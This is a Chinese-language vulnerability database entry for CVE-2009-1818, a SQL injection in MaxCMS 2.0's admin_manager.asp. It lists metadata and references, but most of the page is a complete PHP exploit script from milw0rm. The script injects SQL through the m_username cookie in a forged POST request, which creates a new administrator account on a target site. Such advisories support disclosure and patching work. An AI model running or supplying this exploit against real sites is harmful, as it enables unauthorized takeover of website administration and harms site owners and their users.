Max CMS 'admin_manager.asp' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117756 漏洞类型 SQL注入
发布时间 2009-05-13 更新时间 2009-06-03
CVE编号 CVE-2009-1818 CNNVD-ID CNNVD-200905-337
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8672
https://www.securityfocus.com/bid/34933
https://cxsecurity.com/issue/WLB-2009050034
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200905-337
|漏洞详情
MaxCMS是一款在中国被广泛应用网站内容管理程序。MaxCMS2.0版本的admin/admin_manager.asp中存在SQL注入漏洞。远程攻击者可以借助一个添加操作中的一个m_usernamecookie,执行任意SQL指令。
|漏洞EXP
<?php
print_r('
+---------------------------------------------------------------------------+
maxcms2.0 creat new admin exploit
by Securitylab.ir
+---------------------------------------------------------------------------+
');

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to maxcms
Example:
php '.$argv[0].' localhost /maxcms2/ 
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$name = rand(1,10000);
$cmd = 'm_username=securitylab'.$name.'&m_pwd=securitylab&m_pwd2=securitylab&m_level=0';

$resp = send($cmd);
if (!eregi('alert',$resp)) {echo"[~]bad!,exploit failed";exit;}

print_r('
+---------------------------------------------------------------------------+
[+]cool,exploit seccuss
[+]you have add a new adminuser securitylab'.$name.'/securitylab
+---------------------------------------------------------------------------+
');


function send($cmd)
{
    global $host, $path;
    $message = "POST ".$path."admin/admin_manager.asp?action=add HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: http://$host$path\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: securitylab\r\n";
    $message .= "X-Forwarded-For:1.1.1.1\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Content-Length: ".strlen($cmd)."\r\n";
    $message .= "Cookie: m_username=securitylab'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin; m_level=0; checksecuritylab'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin=cf144fd7a325d1088456838f524ae9d7\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $cmd;
    echo $message;

    $fp = fsockopen($host, 80);
    fputs($fp, $message);

    $resp = '';

    while ($fp && !feof($fp))
    $resp .= fread($fp, 1024);
    echo $resp;
    return $resp;
}
?>

# milw0rm.com [2009-05-13]
|受影响的产品
Dream Windows Inc Max CMS 2.0
|参考资料

来源:XF
名称:maxcms-musername-sql-injection(50513)
链接:http://xforce.iss.net/xforce/xfdb/50513
来源:VUPEN
名称:ADV-2009-1307
链接:http://www.vupen.com/english/advisories/2009/1307
来源:MILW0RM
名称:8672
链接:http://www.milw0rm.com/exploits/8672